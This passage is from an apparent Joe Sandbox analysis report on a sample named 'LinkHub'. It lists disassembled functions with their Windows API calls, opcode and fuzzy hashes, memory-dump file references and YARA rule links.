Opcode ID: 350380e6525ab21993dd8ce0ead3f86022dbb7fb28e2a2e3c0b7ebe78dca7c3c
Instruction ID: 3b258638eb6dab64af8c4bbb409a6fdf906c93166b077cf1fde7f28948af7b93
Opcode Fuzzy Hash: 350380e6525ab21993dd8ce0ead3f86022dbb7fb28e2a2e3c0b7ebe78dca7c3c
Instruction Fuzzy Hash: EE11D33A204341ABCB15AF38D845EBE77E9FF4A750B50402AF952C7260EF319951E7A0

Function 00C460FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00C4615A
_wcslen.LIBCMT ref: 00C4616C
_wcslen.LIBCMT ref: 00C46177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C462B5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 5bb3ed0a6b2fffa14ec6722e0f140efbc94af1e672802dd2979d72e95bfcef46
Instruction ID: e82df6354c70169f7e2e7a6a043927a34166e8d54741ca0c71d706369cc41c56
Opcode Fuzzy Hash: 5bb3ed0a6b2fffa14ec6722e0f140efbc94af1e672802dd2979d72e95bfcef46
Instruction Fuzzy Hash: 0211D375500208A7EF20EFA58C84EEF7BBCFB12754B10402BFA25D6186E770CA44CB62

Function 00BE2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce9b26ca87d719dc898efc8ea8ea334d85afb734ab634a694eabba0af418223
Instruction ID: 226c8aceb6cf90d4c23ad18b2fe02e775f2260ad35e4d4c01097dbfac1c45167
Opcode Fuzzy Hash: cce9b26ca87d719dc898efc8ea8ea334d85afb734ab634a694eabba0af418223
Instruction Fuzzy Hash: C001D6B220529A7EFA21277A6CC1F2B67CDDF813B8B3447A5B921A11D2DF60CC409160

Function 00C12374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C12394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C123A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C123BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C123D7

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1c789c5df30d2b6348214a2d43802a507a8b8bcff9f1efb3bae92fee64142151
Instruction ID: 52a9f6616f5c99264a7a9a980f4b194fd225013fc8a6b172249144ef7a3f12cc
Opcode Fuzzy Hash: 1c789c5df30d2b6348214a2d43802a507a8b8bcff9f1efb3bae92fee64142151
Instruction Fuzzy Hash: EA11093A900218FFEB119BA5CD85FDDFB78FB09750F600091EA11B7290D6716E60EB94

Function 00BB1AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00BB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB24B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00BB1AF4
GetClientRect.USER32(?,?), ref: 00BF31F9
GetCursorPos.USER32(?), ref: 00BF3203
ScreenToClient.USER32(?,?), ref: 00BF320E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: f46da8dc37c4621d8e7df17c3b59db51049d4ee3cafeb5bcd2fbb096d562ded1
Instruction ID: ab24520bf857ade251723e3b934b27988f2597690d25922d2414383f114f563e
Opcode Fuzzy Hash: f46da8dc37c4621d8e7df17c3b59db51049d4ee3cafeb5bcd2fbb096d562ded1
Instruction Fuzzy Hash: CD113D76901019ABCB00EFA8C985AFE77F8FB05344F500892F912E3140C771BA91CBA1

Function 00C1EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C1EB14
MessageBoxW.USER32(?,?,?,?), ref: 00C1EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C1EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C1EB64

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: bf780a0f4b43b05c5663404c27e9096a0c5c2f97ab0f9a9933822213bb37ccd4
Instruction ID: 27049a51a58e4412fb455fe9b00bb8ef4bf81a8f8a3bd55ca8ddb74d54cf6ded
Opcode Fuzzy Hash: bf780a0f4b43b05c5663404c27e9096a0c5c2f97ab0f9a9933822213bb37ccd4
Instruction Fuzzy Hash: 6A112676904218BBC701AFA89C09BDE7FACAB47320F004256FC26E32A0D6749A4497A4

Function 00BDD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00BDD369,00000000,00000004,00000000), ref: 00BDD588
GetLastError.KERNEL32 ref: 00BDD594
__dosmaperr.LIBCMT ref: 00BDD59B
ResumeThread.KERNEL32(00000000), ref: 00BDD5B9

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 75759f3b692de4e36a6bf0308e7fc72a90c94e52c02f1df2138d549ac9f9a950
Instruction ID: 64eea51211c3fe95879270abb4cb507ce0140272ceed520514ac442e38cc0efd
Opcode Fuzzy Hash: 75759f3b692de4e36a6bf0308e7fc72a90c94e52c02f1df2138d549ac9f9a950
Instruction Fuzzy Hash: 2301F9365041147BCB106FA5EC05BAEBBEDEF51738F100397F926863E0EB709800C6A1

Function 00BB7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BB78B1
GetStockObject.GDI32(00000011), ref: 00BB78C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB78CF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 3b0ada59d932428a86bf82a6c88e5f0ed0c6e0072b3d597fd12c750bb9a9a763
Instruction ID: 69ad64a2efae78397a3de949e383f7224b82c7d59db6f9a1964db30cba87dc5f
Opcode Fuzzy Hash: 3b0ada59d932428a86bf82a6c88e5f0ed0c6e0072b3d597fd12c750bb9a9a763
Instruction Fuzzy Hash: D411A972545508BFEF026F91CC98FFABBA9FF493A4F040156FA0252120DB719C60EBA0

Function 00BE33E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C211D9,00000000,00000000,?,00BE338D,00C211D9,00000000,00000000,00000000,?,00BE35FE,00000006,FlsSetValue), ref: 00BE3418
GetLastError.KERNEL32(?,00BE338D,00C211D9,00000000,00000000,00000000,?,00BE35FE,00000006,FlsSetValue,00C53260,FlsSetValue,00000000,00000364,?,00BE31B9), ref: 00BE3424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BE338D,00C211D9,00000000,00000000,00000000,?,00BE35FE,00000006,FlsSetValue,00C53260,FlsSetValue,00000000), ref: 00BE3432

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 084f2545e540441e529595867ab8d45e1c063d6901a7c28f8e626f13d7d78a7e
Instruction ID: 59bb14a7b48da29e36ecfc5658dbdde107bb6ff6ee38e2dc2164d1447be8c3a9
Opcode Fuzzy Hash: 084f2545e540441e529595867ab8d45e1c063d6901a7c28f8e626f13d7d78a7e
Instruction Fuzzy Hash: FB018836711262ABC7225B7A9C48B5A7BF8FF55F617110660F906D73C1D721DD01C6E0

Function 00C17DCB Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C17DE6
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C17DFE
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C17E13
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C17E31

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 1ad2406490cec6196cdcf8491b2668d3ada8eafaf49f0fb8bf3164e083c48fbf
Instruction ID: 51d4ed5bfa198ee304983047884c0618215835ec453f185be3bc4252f96ed6bf
Opcode Fuzzy Hash: 1ad2406490cec6196cdcf8491b2668d3ada8eafaf49f0fb8bf3164e083c48fbf
Instruction Fuzzy Hash: 93115BB9209305AFE7209F65DD08BD67BFCEF02B00F108AA9A617D6150D7B0ED84AB50

Function 00C1BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C1B69A,?,00008000), ref: 00C1BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C1B69A,?,00008000), ref: 00C1BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C1B69A,?,00008000), ref: 00C1BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C1B69A,?,00008000), ref: 00C1BAED

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 8d8d2ee80b0a32ecf19a3e02416a3cb92b88d75fb5bc25871a8ecd6a90892b50
Instruction ID: 46652023dc0645f54e687c0b803ef6f10c05d9aba7a13039de16d1c2900eb074
Opcode Fuzzy Hash: 8d8d2ee80b0a32ecf19a3e02416a3cb92b88d75fb5bc25871a8ecd6a90892b50
Instruction Fuzzy Hash: D2115E31C00619D7CF00EFA5E9497EEBB78FF0A711F104095E941B2250CB305A90EBA5

Function 00C4886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C4888E
ScreenToClient.USER32(?,?), ref: 00C488A6
ScreenToClient.USER32(?,?), ref: 00C488CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C488E5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 485a7a082d48e85aceebe4a1db6f62df5725ab3655f32909174160531e890b05
Instruction ID: bb661d8eb12d75c1991fecab3a2aef66bfa2f34123ad273eec44826e571b3c03
Opcode Fuzzy Hash: 485a7a082d48e85aceebe4a1db6f62df5725ab3655f32909174160531e890b05
Instruction Fuzzy Hash: 991142B9D00209EFDB41DFA8C884AEEBBF5FB09310F508566E915E3250D735AA54CF50

Function 00C136F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C13712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C13723
GetCurrentThreadId.KERNEL32 ref: 00C1372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C13731

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ecba60adfcba193b7174bfb132a9736daa2341931441d2cc17bc04bc7d6f0eed
Instruction ID: f1a3aa565bebcd56398b14d53352b68a52a724e242399f450fe5f3596031e046
Opcode Fuzzy Hash: ecba60adfcba193b7174bfb132a9736daa2341931441d2cc17bc04bc7d6f0eed
Instruction Fuzzy Hash: 6FE06DB5201264BADA2027A29C4DFEF7F6CEB43BA1F000415F50AD2080DAA48A80D2F0

Function 00C492BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BB1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB1F87
Part of subcall function 00BB1F2D: SelectObject.GDI32(?,00000000), ref: 00BB1F96
Part of subcall function 00BB1F2D: BeginPath.GDI32(?), ref: 00BB1FAD
Part of subcall function 00BB1F2D: SelectObject.GDI32(?,00000000), ref: 00BB1FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C492E3
LineTo.GDI32(?,?,?), ref: 00C492F0
EndPath.GDI32(?), ref: 00C49300
StrokePath.GDI32(?), ref: 00C4930E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 973cea4f770653f0cefdf5a0438fc12dd641b8864ba0f83c1b3bcbe9b3e79710
Instruction ID: 6cf5937e32686cfd915b2122bf70dcf82ceced237c2d3699c79ff33b5730d66c
Opcode Fuzzy Hash: 973cea4f770653f0cefdf5a0438fc12dd641b8864ba0f83c1b3bcbe9b3e79710
Instruction Fuzzy Hash: 2CF05E35005669BBDB126F54AC0EFCE3F69BF0B321F048100FA12620E1C7B56621DBE9

Function 00BB21A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BB21BC
SetTextColor.GDI32(?,?), ref: 00BB21C6
SetBkMode.GDI32(?,00000001), ref: 00BB21D9
GetStockObject.GDI32(00000005), ref: 00BB21E1

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: b08af348e5fd129bebb510ad7f2386d2335f117a16640c58819a85af4a70c137
Instruction ID: 6d07e3479934e7c55ad2d8637f9312aaa90f52438388a19721ae9c8efc89f8e8
Opcode Fuzzy Hash: b08af348e5fd129bebb510ad7f2386d2335f117a16640c58819a85af4a70c137
Instruction Fuzzy Hash: 6AE06D35240284AADB216B74AC09BEC3BA1FB16736F048259FBBB980E0C77286449B10

Function 00C0EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C0EC36
GetDC.USER32(00000000), ref: 00C0EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C0EC60
ReleaseDC.USER32(?), ref: 00C0EC81

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 226145befa27ad210c3e50bfc5af79d852002c9d8b503016890a9626466d3c0c
Instruction ID: c4d8ed9f42fc3db7725fe88f75eb42e9d693237fc6ac6512562f104118b8232e
Opcode Fuzzy Hash: 226145befa27ad210c3e50bfc5af79d852002c9d8b503016890a9626466d3c0c
Instruction Fuzzy Hash: D2E0E579800204DFCB40AFA08948BADBBB1BB08311B118849F81BA3250C7785941DF00

Function 00C0EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C0EC4A
GetDC.USER32(00000000), ref: 00C0EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C0EC60
ReleaseDC.USER32(?), ref: 00C0EC81

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 61320040666bf856f410b75126fb3113f7645e6481fc414b065e3db3b42874fa
Instruction ID: 1f0c633549f61edfda2d9d31e0103b070dba7b652fcdabe157b3d654b31c5c77
Opcode Fuzzy Hash: 61320040666bf856f410b75126fb3113f7645e6481fc414b065e3db3b42874fa
Instruction Fuzzy Hash: 13E012B8C00204EFCB50AFA0C848BADBBF1BB08311B118849F81BE3260CB78A901DF00

Function 00C257CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB41EA: _wcslen.LIBCMT ref: 00BB41EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C25919

Strings

LPT, xrefs: 00C25840
*, xrefs: 00C25855

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: ddee08f4b7e28d38d273eb1f4949c792b535f5c4c69a40fe08e7e4d52eb3c046
Instruction ID: 638f82b8d6b239cb22837a9c6c5ff6165a482649551ce1edc4eb077d77e1d0db
Opcode Fuzzy Hash: ddee08f4b7e28d38d273eb1f4949c792b535f5c4c69a40fe08e7e4d52eb3c046
Instruction Fuzzy Hash: 29918D75A00614DFCB14DF54D485EAABBF1BF44304F188099E85A9F7A2C771EE86CB90

Function 00BDE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00BDE67D

Strings

pow, xrefs: 00BDE655, 00BDE672

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
